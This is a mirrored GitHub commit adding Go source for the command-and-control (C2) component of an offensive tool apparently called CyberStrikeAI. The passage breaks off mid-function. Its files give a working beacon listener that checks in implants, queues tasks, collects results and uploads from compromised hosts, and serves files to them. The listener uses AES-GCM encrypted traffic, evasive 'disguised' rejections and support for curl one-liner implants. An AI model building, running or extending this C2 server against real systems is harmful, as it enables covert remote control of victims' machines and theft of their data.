mirror of
https://github.com/Ed1s0nZ/CyberStrikeAI.git
synced 2026-06-10 08:13:59 +02:00
Add files via upload
This commit is contained in:
@@ -0,0 +1,39 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// ResolveBeaconDialHost 决定植入端应连接的主机名(不含端口)。
|
||||
// 优先级:explicitOverride > 监听器 config_json 中的 callback_host > bind_host(0.0.0.0/::/空 时 detectExternalIP,失败则 127.0.0.1)。
|
||||
func ResolveBeaconDialHost(listener *database.C2Listener, explicitOverride string, logger *zap.Logger, listenerID string) string {
|
||||
if h := strings.TrimSpace(explicitOverride); h != "" {
|
||||
return h
|
||||
}
|
||||
cfg := &ListenerConfig{}
|
||||
if listener != nil && listener.ConfigJSON != "" {
|
||||
_ = parseJSON(listener.ConfigJSON, cfg)
|
||||
}
|
||||
if h := strings.TrimSpace(cfg.CallbackHost); h != "" {
|
||||
return h
|
||||
}
|
||||
if listener == nil {
|
||||
return "127.0.0.1"
|
||||
}
|
||||
host := strings.TrimSpace(listener.BindHost)
|
||||
if host == "0.0.0.0" || host == "" || host == "::" {
|
||||
host = detectExternalIP()
|
||||
if host == "" {
|
||||
if logger != nil {
|
||||
logger.Warn("listener binds 0.0.0.0 but no external IP detected, falling back to 127.0.0.1; set callback_host or pass explicit host",
|
||||
zap.String("listener_id", listenerID))
|
||||
}
|
||||
return "127.0.0.1"
|
||||
}
|
||||
}
|
||||
return host
|
||||
}
|
||||
+154
@@ -0,0 +1,154 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"crypto/aes"
|
||||
"crypto/cipher"
|
||||
"crypto/rand"
|
||||
"encoding/base64"
|
||||
"errors"
|
||||
"io"
|
||||
)
|
||||
|
||||
// AES-256-GCM 信封:每个 Listener 独立 32 字节密钥 + 每条消息独立 12 字节 nonce。
|
||||
// 协议格式(base64 文本,便于 HTTP body / SSE 直接传):
|
||||
// base64( nonce(12) || ciphertext+tag )
|
||||
// 设计要点:
|
||||
// - GCM 自带 16 字节 AEAD tag,完整性 + 机密性一次性搞定,无需额外 HMAC;
|
||||
// - nonce 由 crypto/rand 生成,96bit 在密钥不变期内重复概率极低(< 2^-32 / 4B 次);
|
||||
// - 密钥不出服务端:listener 创建时随机生成 32 字节,编译 beacon 时硬编码进去。
|
||||
|
||||
// GenerateAESKey 生成随机 32 字节 AES-256 密钥并 base64 输出
|
||||
func GenerateAESKey() (string, error) {
|
||||
key := make([]byte, 32)
|
||||
if _, err := io.ReadFull(rand.Reader, key); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return base64.StdEncoding.EncodeToString(key), nil
|
||||
}
|
||||
|
||||
// GenerateImplantToken 生成 32 字节 token,base64 编码(implant 携带在 HTTP header 鉴权用)
|
||||
func GenerateImplantToken() (string, error) {
|
||||
t := make([]byte, 32)
|
||||
if _, err := io.ReadFull(rand.Reader, t); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return base64.RawURLEncoding.EncodeToString(t), nil
|
||||
}
|
||||
|
||||
// EncryptAESGCM 加密任意明文,返回 base64(nonce||ct)
|
||||
func EncryptAESGCM(keyB64 string, plaintext []byte) (string, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
nonce := make([]byte, gcm.NonceSize())
|
||||
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
|
||||
return "", err
|
||||
}
|
||||
ct := gcm.Seal(nil, nonce, plaintext, nil)
|
||||
out := append(nonce, ct...)
|
||||
return base64.StdEncoding.EncodeToString(out), nil
|
||||
}
|
||||
|
||||
// DecryptAESGCM 解密 base64(nonce||ct),返回明文
|
||||
func DecryptAESGCM(keyB64, encB64 string) ([]byte, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
raw, err := base64.StdEncoding.DecodeString(encB64)
|
||||
if err != nil {
|
||||
return nil, errors.New("ciphertext base64 invalid")
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
nonceSize := gcm.NonceSize()
|
||||
if len(raw) < nonceSize+16 { // 至少 nonce + tag
|
||||
return nil, errors.New("ciphertext too short")
|
||||
}
|
||||
nonce, ct := raw[:nonceSize], raw[nonceSize:]
|
||||
pt, err := gcm.Open(nil, nonce, ct, nil)
|
||||
if err != nil {
|
||||
return nil, errors.New("aead open failed (key mismatch or tampered)")
|
||||
}
|
||||
return pt, nil
|
||||
}
|
||||
|
||||
// EncryptAESGCMWithAAD encrypts with additional authenticated data bound to context (e.g. session_id).
|
||||
// Prevents cross-session replay: ciphertext from session A cannot be fed to session B.
|
||||
func EncryptAESGCMWithAAD(keyB64 string, plaintext []byte, aad []byte) (string, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
nonce := make([]byte, gcm.NonceSize())
|
||||
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
|
||||
return "", err
|
||||
}
|
||||
ct := gcm.Seal(nil, nonce, plaintext, aad)
|
||||
out := append(nonce, ct...)
|
||||
return base64.StdEncoding.EncodeToString(out), nil
|
||||
}
|
||||
|
||||
// DecryptAESGCMWithAAD decrypts with AAD verification.
|
||||
func DecryptAESGCMWithAAD(keyB64, encB64 string, aad []byte) ([]byte, error) {
|
||||
key, err := decodeKey(keyB64)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
raw, err := base64.StdEncoding.DecodeString(encB64)
|
||||
if err != nil {
|
||||
return nil, errors.New("ciphertext base64 invalid")
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
nonceSize := gcm.NonceSize()
|
||||
if len(raw) < nonceSize+16 {
|
||||
return nil, errors.New("ciphertext too short")
|
||||
}
|
||||
nonce, ct := raw[:nonceSize], raw[nonceSize:]
|
||||
pt, err := gcm.Open(nil, nonce, ct, aad)
|
||||
if err != nil {
|
||||
return nil, errors.New("aead open failed (key mismatch, tampered, or AAD mismatch)")
|
||||
}
|
||||
return pt, nil
|
||||
}
|
||||
|
||||
func decodeKey(keyB64 string) ([]byte, error) {
|
||||
key, err := base64.StdEncoding.DecodeString(keyB64)
|
||||
if err != nil {
|
||||
return nil, errors.New("key base64 invalid")
|
||||
}
|
||||
if len(key) != 32 {
|
||||
return nil, errors.New("key must be 32 bytes (AES-256)")
|
||||
}
|
||||
return key, nil
|
||||
}
|
||||
+144
@@ -0,0 +1,144 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
)
|
||||
|
||||
// Event 是 EventBus 内部传输的事件单元,是 database.C2Event 的"实时投影"。
|
||||
// 区别在于:
|
||||
// - 数据库表保存全部历史,用于审计与列表分页;
|
||||
// - EventBus 只缓存最近 N 条,用于 SSE/WS 实时推送给在线订阅者。
|
||||
type Event struct {
|
||||
ID string `json:"id"`
|
||||
Level string `json:"level"`
|
||||
Category string `json:"category"`
|
||||
SessionID string `json:"sessionId,omitempty"`
|
||||
TaskID string `json:"taskId,omitempty"`
|
||||
Message string `json:"message"`
|
||||
Data map[string]interface{} `json:"data,omitempty"`
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
}
|
||||
|
||||
// EventBus 简单的内存广播总线。
|
||||
// 设计要点:
|
||||
// - 多订阅者:每个订阅者有独立 buffered channel,慢消费者不会阻塞 publisher;
|
||||
// - 容量满即丢弃:发布端绝不阻塞,避免 listener accept loop / beacon handler 卡住;
|
||||
// - 全局过滤:订阅时可限定 SessionID/Category,前端按需订阅,省 CPU;
|
||||
// - 关闭安全:Close() 后所有订阅者 chan 关闭,防止 goroutine 泄漏。
|
||||
type EventBus struct {
|
||||
mu sync.RWMutex
|
||||
subscribers map[string]*Subscription
|
||||
closed bool
|
||||
}
|
||||
|
||||
// Subscription 订阅句柄
|
||||
type Subscription struct {
|
||||
ID string
|
||||
Ch chan *Event
|
||||
SessionID string // 空表示不限制
|
||||
Category string // 空表示不限制
|
||||
Levels map[string]struct{}
|
||||
dropCount atomic.Int64
|
||||
}
|
||||
|
||||
// NewEventBus 创建总线
|
||||
func NewEventBus() *EventBus {
|
||||
return &EventBus{subscribers: make(map[string]*Subscription)}
|
||||
}
|
||||
|
||||
// Subscribe 注册订阅者;返回 Subscription,调用方负责后续 Unsubscribe。
|
||||
// - bufferSize:单订阅者 channel 容量,建议 64~256;
|
||||
// - sessionFilter / categoryFilter:空字符串=不限;
|
||||
// - levelFilter:[]string{"warn","critical"} 这类,nil/空表示全收。
|
||||
func (b *EventBus) Subscribe(id string, bufferSize int, sessionFilter, categoryFilter string, levelFilter []string) *Subscription {
|
||||
if bufferSize <= 0 {
|
||||
bufferSize = 128
|
||||
}
|
||||
sub := &Subscription{
|
||||
ID: id,
|
||||
Ch: make(chan *Event, bufferSize),
|
||||
SessionID: sessionFilter,
|
||||
Category: categoryFilter,
|
||||
}
|
||||
if len(levelFilter) > 0 {
|
||||
sub.Levels = make(map[string]struct{}, len(levelFilter))
|
||||
for _, l := range levelFilter {
|
||||
sub.Levels[l] = struct{}{}
|
||||
}
|
||||
}
|
||||
b.mu.Lock()
|
||||
defer b.mu.Unlock()
|
||||
if b.closed {
|
||||
close(sub.Ch)
|
||||
return sub
|
||||
}
|
||||
b.subscribers[id] = sub
|
||||
return sub
|
||||
}
|
||||
|
||||
// Unsubscribe 注销订阅者并关闭 channel
|
||||
func (b *EventBus) Unsubscribe(id string) {
|
||||
b.mu.Lock()
|
||||
defer b.mu.Unlock()
|
||||
if sub, ok := b.subscribers[id]; ok {
|
||||
delete(b.subscribers, id)
|
||||
close(sub.Ch)
|
||||
}
|
||||
}
|
||||
|
||||
// Publish 广播事件给所有订阅者;非阻塞,channel 满时静默丢弃
|
||||
func (b *EventBus) Publish(e *Event) {
|
||||
if e == nil {
|
||||
return
|
||||
}
|
||||
b.mu.RLock()
|
||||
subs := make([]*Subscription, 0, len(b.subscribers))
|
||||
for _, s := range b.subscribers {
|
||||
if s.matches(e) {
|
||||
subs = append(subs, s)
|
||||
}
|
||||
}
|
||||
closed := b.closed
|
||||
b.mu.RUnlock()
|
||||
if closed {
|
||||
return
|
||||
}
|
||||
for _, s := range subs {
|
||||
select {
|
||||
case s.Ch <- e:
|
||||
default:
|
||||
s.dropCount.Add(1)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Close 关闭总线,停止所有订阅
|
||||
func (b *EventBus) Close() {
|
||||
b.mu.Lock()
|
||||
defer b.mu.Unlock()
|
||||
if b.closed {
|
||||
return
|
||||
}
|
||||
b.closed = true
|
||||
for id, s := range b.subscribers {
|
||||
close(s.Ch)
|
||||
delete(b.subscribers, id)
|
||||
}
|
||||
}
|
||||
|
||||
func (s *Subscription) matches(e *Event) bool {
|
||||
if s.SessionID != "" && e.SessionID != s.SessionID {
|
||||
return false
|
||||
}
|
||||
if s.Category != "" && e.Category != s.Category {
|
||||
return false
|
||||
}
|
||||
if len(s.Levels) > 0 {
|
||||
if _, ok := s.Levels[e.Level]; !ok {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
}
|
||||
@@ -0,0 +1,29 @@
|
||||
package c2
|
||||
|
||||
import "context"
|
||||
|
||||
type hitlRunCtxKey struct{}
|
||||
|
||||
// WithHITLRunContext 将 runCtx(通常为整条 Agent / SSE 请求生命周期)挂到传入的 ctx 上。
|
||||
// MCP 工具 handler 收到的 ctx 可能是带单次工具超时的子 context,在工具 return 时会被 cancel;
|
||||
// 危险任务 HITL 应通过 HITLUserContext 使用 runCtx 等待人工审批。
|
||||
func WithHITLRunContext(ctx, runCtx context.Context) context.Context {
|
||||
if ctx == nil || runCtx == nil {
|
||||
return ctx
|
||||
}
|
||||
return context.WithValue(ctx, hitlRunCtxKey{}, runCtx)
|
||||
}
|
||||
|
||||
// HITLUserContext 返回用于 C2 危险任务 HITL 等待的 context:
|
||||
// 若曾用 WithHITLRunContext 注入更长寿命的 runCtx 则返回之,否则返回 ctx。
|
||||
func HITLUserContext(ctx context.Context) context.Context {
|
||||
if ctx == nil {
|
||||
return context.Background()
|
||||
}
|
||||
if v := ctx.Value(hitlRunCtxKey{}); v != nil {
|
||||
if run, ok := v.(context.Context); ok && run != nil {
|
||||
return run
|
||||
}
|
||||
}
|
||||
return ctx
|
||||
}
|
||||
@@ -0,0 +1,22 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"os"
|
||||
)
|
||||
|
||||
// 这些薄封装存在的目的:
|
||||
// - 让 manager.go / handler 中的逻辑更直观,避免反复 import os;
|
||||
// - 便于将来用接口抽象(譬如改成 internal/storage 的实现)做单元测试。
|
||||
|
||||
func osMkdirAll(path string, perm os.FileMode) error {
|
||||
return os.MkdirAll(path, perm)
|
||||
}
|
||||
|
||||
func osWriteFile(path string, data []byte, perm os.FileMode) error {
|
||||
return os.WriteFile(path, data, perm)
|
||||
}
|
||||
|
||||
func base64Decode(s string) ([]byte, error) {
|
||||
return base64.StdEncoding.DecodeString(s)
|
||||
}
|
||||
@@ -0,0 +1,69 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Listener 监听器抽象:每种传输方式(TCP/HTTP/HTTPS/WS/DNS)都实现此接口;
|
||||
// Manager 不感知具体实现细节,通过 ListenerRegistry 工厂创建。
|
||||
type Listener interface {
|
||||
// Type 返回当前 listener 的类型字符串(如 "tcp_reverse")
|
||||
Type() string
|
||||
// Start 启动监听;如果端口被占用应返回 ErrPortInUse
|
||||
Start() error
|
||||
// Stop 停止监听并释放所有相关 goroutine(不应抛 panic)
|
||||
Stop() error
|
||||
}
|
||||
|
||||
// ListenerCreationCtx 工厂初始化 listener 时收到的上下文
|
||||
type ListenerCreationCtx struct {
|
||||
Listener *database.C2Listener
|
||||
Config *ListenerConfig
|
||||
Manager *Manager
|
||||
Logger *zap.Logger
|
||||
}
|
||||
|
||||
// ListenerFactory 创建 listener 实例的工厂;返回的实例尚未 Start
|
||||
type ListenerFactory func(ctx ListenerCreationCtx) (Listener, error)
|
||||
|
||||
// ListenerRegistry 类型 → 工厂 的注册表,由 internal/app 启动时注册具体实现,
|
||||
// 测试中也可注入 mock 工厂来覆盖。
|
||||
type ListenerRegistry struct {
|
||||
mu sync.RWMutex
|
||||
factories map[string]ListenerFactory
|
||||
}
|
||||
|
||||
// NewListenerRegistry 创建空注册表
|
||||
func NewListenerRegistry() *ListenerRegistry {
|
||||
return &ListenerRegistry{factories: make(map[string]ListenerFactory)}
|
||||
}
|
||||
|
||||
// Register 注册一种 listener 工厂
|
||||
func (r *ListenerRegistry) Register(typeName string, f ListenerFactory) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.factories[strings.ToLower(strings.TrimSpace(typeName))] = f
|
||||
}
|
||||
|
||||
// Get 取工厂;nil 表示未注册
|
||||
func (r *ListenerRegistry) Get(typeName string) ListenerFactory {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
return r.factories[strings.ToLower(strings.TrimSpace(typeName))]
|
||||
}
|
||||
|
||||
// RegisteredTypes 列出已注册的类型,给前端枚举用
|
||||
func (r *ListenerRegistry) RegisteredTypes() []string {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
out := make([]string, 0, len(r.factories))
|
||||
for k := range r.factories {
|
||||
out = append(out, k)
|
||||
}
|
||||
return out
|
||||
}
|
||||
@@ -0,0 +1,549 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"crypto/ecdsa"
|
||||
"crypto/elliptic"
|
||||
"crypto/rand"
|
||||
"crypto/sha256"
|
||||
"crypto/subtle"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"crypto/x509/pkix"
|
||||
"encoding/base64"
|
||||
"encoding/hex"
|
||||
"encoding/json"
|
||||
"encoding/pem"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"math/big"
|
||||
mrand "math/rand"
|
||||
"net"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// HTTPBeaconListener 实现 HTTP/HTTPS Beacon:
|
||||
// - beacon 端定期 POST {checkin_path}(携带 implant_token + AES 加密 body);
|
||||
// - 服务端解密、登记会话、回执 sleep + 是否有任务;
|
||||
// - beacon 收到 has_tasks=true 时 GET {tasks_path} 拉取加密任务列表;
|
||||
// - 任务完成后 POST {result_path} 回传结果。
|
||||
//
|
||||
// 优势:所有任务异步、可批量、支持文件上传/截图/任意大 blob,是 C2 的"主战场"。
|
||||
type HTTPBeaconListener struct {
|
||||
rec *database.C2Listener
|
||||
cfg *ListenerConfig
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
useTLS bool
|
||||
profile *database.C2Profile
|
||||
|
||||
srv *http.Server
|
||||
mu sync.Mutex
|
||||
stopCh chan struct{}
|
||||
stopped bool
|
||||
}
|
||||
|
||||
// NewHTTPBeaconListener 工厂(注册到 ListenerRegistry["http_beacon"])
|
||||
func NewHTTPBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &HTTPBeaconListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
useTLS: false,
|
||||
stopCh: make(chan struct{}),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// NewHTTPSBeaconListener 工厂(注册到 ListenerRegistry["https_beacon"])
|
||||
func NewHTTPSBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &HTTPBeaconListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
useTLS: true,
|
||||
stopCh: make(chan struct{}),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Type 类型字符串
|
||||
func (l *HTTPBeaconListener) Type() string {
|
||||
if l.useTLS {
|
||||
return string(ListenerTypeHTTPSBeacon)
|
||||
}
|
||||
return string(ListenerTypeHTTPBeacon)
|
||||
}
|
||||
|
||||
// Start 起 HTTP server
|
||||
func (l *HTTPBeaconListener) Start() error {
|
||||
// Load Malleable Profile if configured
|
||||
l.loadProfile()
|
||||
|
||||
mux := http.NewServeMux()
|
||||
mux.HandleFunc(l.cfg.BeaconCheckInPath, l.withProfileHeaders(l.handleCheckIn))
|
||||
mux.HandleFunc(l.cfg.BeaconTasksPath, l.withProfileHeaders(l.handleTasks))
|
||||
mux.HandleFunc(l.cfg.BeaconResultPath, l.withProfileHeaders(l.handleResult))
|
||||
mux.HandleFunc(l.cfg.BeaconUploadPath, l.withProfileHeaders(l.handleUpload))
|
||||
mux.HandleFunc(l.cfg.BeaconFilePath, l.withProfileHeaders(l.handleFileServe))
|
||||
|
||||
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
|
||||
l.srv = &http.Server{
|
||||
Addr: addr,
|
||||
Handler: mux,
|
||||
ReadHeaderTimeout: 15 * time.Second,
|
||||
ReadTimeout: 60 * time.Second,
|
||||
WriteTimeout: 120 * time.Second,
|
||||
IdleTimeout: 300 * time.Second,
|
||||
}
|
||||
|
||||
ln, err := net.Listen("tcp", addr)
|
||||
if err != nil {
|
||||
if isAddrInUse(err) {
|
||||
return ErrPortInUse
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
if l.useTLS {
|
||||
tlsConfig, err := l.buildTLSConfig()
|
||||
if err != nil {
|
||||
_ = ln.Close()
|
||||
return fmt.Errorf("build TLS config: %w", err)
|
||||
}
|
||||
l.srv.TLSConfig = tlsConfig
|
||||
go func() {
|
||||
if err := l.srv.ServeTLS(ln, "", ""); err != nil && !errors.Is(err, http.ErrServerClosed) {
|
||||
l.logger.Warn("https_beacon ServeTLS exited", zap.Error(err))
|
||||
}
|
||||
}()
|
||||
} else {
|
||||
go func() {
|
||||
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
|
||||
l.logger.Warn("http_beacon Serve exited", zap.Error(err))
|
||||
}
|
||||
}()
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Stop 关闭
|
||||
func (l *HTTPBeaconListener) Stop() error {
|
||||
l.mu.Lock()
|
||||
if l.stopped {
|
||||
l.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
l.stopped = true
|
||||
close(l.stopCh)
|
||||
l.mu.Unlock()
|
||||
if l.srv != nil {
|
||||
ctx, cancel := contextWithTimeout(5 * time.Second)
|
||||
defer cancel()
|
||||
_ = l.srv.Shutdown(ctx)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// HTTP handlers
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
func (l *HTTPBeaconListener) handleCheckIn(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20))
|
||||
if err != nil {
|
||||
http.Error(w, "read failed", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
// 尝试 AES-GCM 解密(完整 beacon 二进制走加密通道)
|
||||
var req ImplantCheckInRequest
|
||||
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
|
||||
if decErr == nil {
|
||||
if err := json.Unmarshal(plaintext, &req); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
} else {
|
||||
// 解密失败:尝试当作明文 JSON(兼容 curl oneliner 等轻量级客户端)
|
||||
if err := json.Unmarshal(body, &req); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
}
|
||||
isPlaintext := decErr != nil
|
||||
|
||||
if req.UserAgent == "" {
|
||||
req.UserAgent = r.UserAgent()
|
||||
}
|
||||
if req.SleepSeconds <= 0 {
|
||||
req.SleepSeconds = l.cfg.DefaultSleep
|
||||
}
|
||||
// curl oneliner 可能不携带完整字段,用 remote IP + listener ID 生成稳定标识
|
||||
host, _, _ := net.SplitHostPort(r.RemoteAddr)
|
||||
if strings.TrimSpace(req.ImplantUUID) == "" {
|
||||
// 基于 IP + listener ID 生成稳定 UUID,同一 IP 多次 check_in 复用同一会话
|
||||
req.ImplantUUID = fmt.Sprintf("curl_%s_%s", host, shortHash(host+l.rec.ID))
|
||||
}
|
||||
if strings.TrimSpace(req.Hostname) == "" {
|
||||
req.Hostname = "curl_" + host
|
||||
}
|
||||
if strings.TrimSpace(req.InternalIP) == "" {
|
||||
req.InternalIP = host
|
||||
}
|
||||
if strings.TrimSpace(req.OS) == "" {
|
||||
req.OS = "unknown"
|
||||
}
|
||||
if strings.TrimSpace(req.Arch) == "" {
|
||||
req.Arch = "unknown"
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
|
||||
if err != nil {
|
||||
http.Error(w, "ingest failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: session.ID,
|
||||
Status: string(TaskQueued),
|
||||
Limit: 1,
|
||||
})
|
||||
resp := ImplantCheckInResponse{
|
||||
SessionID: session.ID,
|
||||
NextSleep: session.SleepSeconds,
|
||||
NextJitter: session.JitterPercent,
|
||||
HasTasks: len(queued) > 0,
|
||||
ServerTime: time.Now().UnixMilli(),
|
||||
}
|
||||
if isPlaintext {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(resp)
|
||||
} else {
|
||||
l.writeEncrypted(w, resp)
|
||||
}
|
||||
}
|
||||
|
||||
func (l *HTTPBeaconListener) handleTasks(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodGet {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
sessionID := r.URL.Query().Get("session_id")
|
||||
if sessionID == "" {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
session, err := l.manager.DB().GetC2Session(sessionID)
|
||||
if err != nil || session == nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
|
||||
if err != nil {
|
||||
http.Error(w, "pop tasks failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
if envelopes == nil {
|
||||
envelopes = []TaskEnvelope{}
|
||||
}
|
||||
resp := map[string]interface{}{"tasks": envelopes}
|
||||
if l.isPlaintextClient(r) {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(resp)
|
||||
} else {
|
||||
l.writeEncrypted(w, resp)
|
||||
}
|
||||
}
|
||||
|
||||
func (l *HTTPBeaconListener) handleResult(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 64<<20))
|
||||
if err != nil {
|
||||
http.Error(w, "read failed", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
var report TaskResultReport
|
||||
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
|
||||
if decErr == nil {
|
||||
if err := json.Unmarshal(plaintext, &report); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
} else {
|
||||
if err := json.Unmarshal(body, &report); err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
}
|
||||
if err := l.manager.IngestTaskResult(report); err != nil {
|
||||
http.Error(w, "ingest result failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
resp := map[string]string{"ok": "1"}
|
||||
if l.isPlaintextClient(r) {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(resp)
|
||||
} else {
|
||||
l.writeEncrypted(w, resp)
|
||||
}
|
||||
}
|
||||
|
||||
// handleUpload 实现 implant 主动上传文件给服务端(如 download 任务的二进制结果)。
|
||||
// Body 为 AES-GCM 加密后的 base64,与 check-in/result 保持一致的安全策略。
|
||||
func (l *HTTPBeaconListener) handleUpload(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
taskID := r.URL.Query().Get("task_id")
|
||||
if taskID == "" {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 256<<20))
|
||||
if err != nil {
|
||||
http.Error(w, "read failed", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
plaintext, err := DecryptAESGCM(l.rec.EncryptionKey, string(body))
|
||||
if err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
dir := filepath.Join(l.manager.StorageDir(), "uploads")
|
||||
if err := os.MkdirAll(dir, 0o755); err != nil {
|
||||
http.Error(w, "mkdir failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
dst := filepath.Join(dir, taskID+".bin")
|
||||
if err := os.WriteFile(dst, plaintext, 0o644); err != nil {
|
||||
http.Error(w, "save failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
l.writeEncrypted(w, map[string]interface{}{"ok": 1, "size": len(plaintext)})
|
||||
}
|
||||
|
||||
// handleFileServe 实现服务端 → implant 的文件下发(upload 任务用)。
|
||||
// 路径形如 /file/<task_id>,文件内容经 AES-GCM 加密后返回。
|
||||
func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodGet {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
prefix := l.cfg.BeaconFilePath
|
||||
taskID := strings.TrimPrefix(r.URL.Path, prefix)
|
||||
